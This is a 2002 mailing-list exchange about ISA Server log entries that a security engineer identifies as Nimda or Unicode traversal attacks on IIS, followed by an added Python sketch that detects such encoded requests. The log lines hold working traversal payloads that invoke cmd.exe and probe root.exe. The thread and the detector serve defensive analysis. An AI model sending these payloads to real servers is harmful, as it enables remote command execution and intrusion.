Hi Vinay,

That looks like an attempt by the Nimda worm or maybe some attacker. This worm infects other hosts by making use of the UNICODE attack. Make sure your IIS servers are protected against this and other attacks. Check out the Microsoft security page regarding this:

http://www.microsoft.com/technet/prodtechnol/isa/deploy/isanimda.asp

Regards
------------------------------------------------------------
Sandro Gauci - Security Engineer - GFI - http://www.gfi.com
------------------------------------------------------------

-----Original Message-----
From: Vinaykumar G [mailto:G.Vinay@xxxxxxxxx]
Sent: Tuesday, March 12, 2002 11:16 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] Block these entries in ISA logs please!!!!!!
Importance: High

http://www.ISAserver.org

Hi All,

Can anyone let me know how we can block these strange entries in my ISA Log? What is someone exactly trying to execute? What should be done to block these entries? I have ISA in integrated mode with win2k server fully patched.

xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:16 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:18 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:19 W3ReverseProxy ISAICR - - - - - - 98 - TCP GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:21 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:23 W3ReverseProxy ISAICR - - - - - - 100 - TCP GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:25 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:07 W3ReverseProxy ISAICR - - - - - - 72 - TCP GET /scripts/root.exe?/c+dir - - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:09 W3ReverseProxy ISAICR - - - - - - 70 - TCP GET /MSADC/root.exe?/c+dir - - 12202 0 Default rule -

Regards,
Vinay.
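
The requests in the log above differ only in how the slash or backslash between the two ".." segments is encoded. The following is an added example, not part of the original thread: a log triage sketch that decodes each URI until it stops changing, folds overlong UTF-8 back to ASCII, and labels what is left. The names classify, scan and SAMPLE, the finding labels and the four-round decoding cap are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Two-byte UTF-8 sequences with lead byte C0/C1 are overlong encodings of ASCII.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def _fold(m):
    b0, b1 = m.group(0)                      # C0 AF -> 0x2F (slash), C1 9C -> 0x5C (backslash)
    return bytes([((b0 & 0x1F) << 6) | (b1 & 0x3F)])

def classify(uri, max_rounds=4):
    """Decode the URI until it stops changing and return a set of findings."""
    findings, data, rounds = set(), uri.encode("utf-8"), 0
    while rounds < max_rounds:
        step = unquote_to_bytes(data)        # one pass of %XX decoding
        if OVERLONG.search(step):
            findings.add("overlong-utf8")
        step = OVERLONG.sub(_fold, step)
        if step == data:
            break
        data, rounds = step, rounds + 1
    if rounds > 1:                           # %252f, %%35c, %25%35%63 ...
        findings.add("multi-encoded")
    path = data.decode("latin-1").replace("\\", "/").lower().split("?", 1)[0]
    segments = path.split("/")
    if ".." in segments:
        findings.add("traversal")
    if segments[-1] in ("cmd.exe", "root.exe"):
        findings.add("shell:" + segments[-1])
    return findings

def scan(lines):
    """Yield (uri, findings) for every GET request that produced a finding."""
    for line in lines:
        m = re.search(r"\bGET\s+(\S+)", line)
        if m and classify(m.group(1)):
            yield m.group(1), classify(m.group(1))

# Request fields trimmed from the log in the post; the last line is constructed.
SAMPLE = [
    "TCP GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -",
    "TCP GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule -",
    "TCP GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - 12202 0 Default rule -",
    "TCP GET /MSADC/root.exe?/c+dir - - 12202 0 Default rule -",
    "TCP GET /default.htm 200 - 12202 0 Default rule -",
]

if __name__ == "__main__":
    for uri, found in scan(SAMPLE):
        print(sorted(found), uri)
```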